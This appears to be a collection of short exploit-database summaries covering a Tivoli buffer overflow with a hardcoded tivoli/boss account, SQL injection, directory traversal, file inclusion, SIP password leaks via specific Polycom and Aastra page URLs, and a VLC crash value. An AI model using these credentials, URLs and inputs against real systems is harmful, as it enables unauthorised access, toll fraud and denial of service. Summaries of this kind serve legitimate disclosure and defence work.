This module exploits a stack based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization is required. This exploit makes use of a second vulnerability, a hardcoded account (tivoli/boss) is used to bypass the authorization restriction.
A blind SQL injection vulnerability exists in technote7.2 and lower versions, and Mysql 3.x and higher versions. An attacker can control the alignment of data with the sort variable using the 'case' statement. An exploit can be used to sort by the 'no' or 'uid' column. The exploit is written in Python and uses the 'lpad' and 'ascii' functions to extract data from the 'm_pass' column in the 'a_tn3_memberboard_list' table.
A directory traversal vulnerability, can be exploited to read files outside of the web root. The vulnerability is present in Trend Micro Data Loss Prevention Virtual Appliance 5.5. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable server. This will allow the attacker to read files outside of the web root.
A directory traversal vulnerability in Tele Data Contact Management Server can be exploited to read files outside of the web root.
A local file inclusion vulnerability in Angora Guestbook 1.5 can be exploited to include arbitrary files. The proof of concept is a URL that includes a path to the Windows win.ini file.
Pacer Edition CMS suffers from a local file inlcusion vulnerability when input passed thru the 'l' parameter to admin/login/forgot/index.php script is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.
The data disclosure vulnerability found in the section of 'Lines' -> 'Line 1' of 'Polycom IP Phone' software. The vulnerability allows the attacker to disclosure the password of the username for the phone line that connected. To exploit the vulnerability and discluse the data we need to access to the 'Polycom IP Phone' by this url 'http://address/reg_1.htm'. Then we can see in the source code by the field 'reg.1.auth.password' and then we see the magic! thats is the password for the username by the sip server.
The data disclosure vulnerability found in the section of 'Global SIP' / 'Line 1' of 'Aastra IP Phone' software. The vulnerability allows the attacker to disclosure the password of the username for the phone line that connected. To exploit the vulnerability and dicluse the data we need to access to the 'Aastra IP Phone' by this url 'http://address/globalSIPsettings.html'. Or to the following address 'http://address/SIPsettingsLine1.html', we have Caller ID, Authentication Name, and Password.. Then we can see in the source code by the field 'password' and then we see the magic! thats is the password for the username by the sip server. Now if we already have the sip server, username a password we can use it to connect to the sip server and make calls.
The vulnerability exists in the 'section.asp' and 'id' parameters of the website, which can be exploited to inject malicious SQL queries. An attacker can inject malicious SQL queries to gain access to the database and extract sensitive information.
A sample of the XSPF document is as follows: The VLC XSPF file uses a tag <vlc:id></vlc:id> in the component Demuxers: Playlist which accepts decimal values for the vlc:id. When entering a large value that is beyond the memory segment that is allocated for program data the program crashes. Setting <vlc:id> value to 1073741823,e.g. <vlc:id>1073741823</vlc:id> will results in a MEMORY ACCESS VIOLATION and the application crash. The vulnerable code in module libplaylist_plugin.dll looks like (pseudo C code example): Once we hit an address that does not exist we will result in a Denial of Service condition.
Services By CQR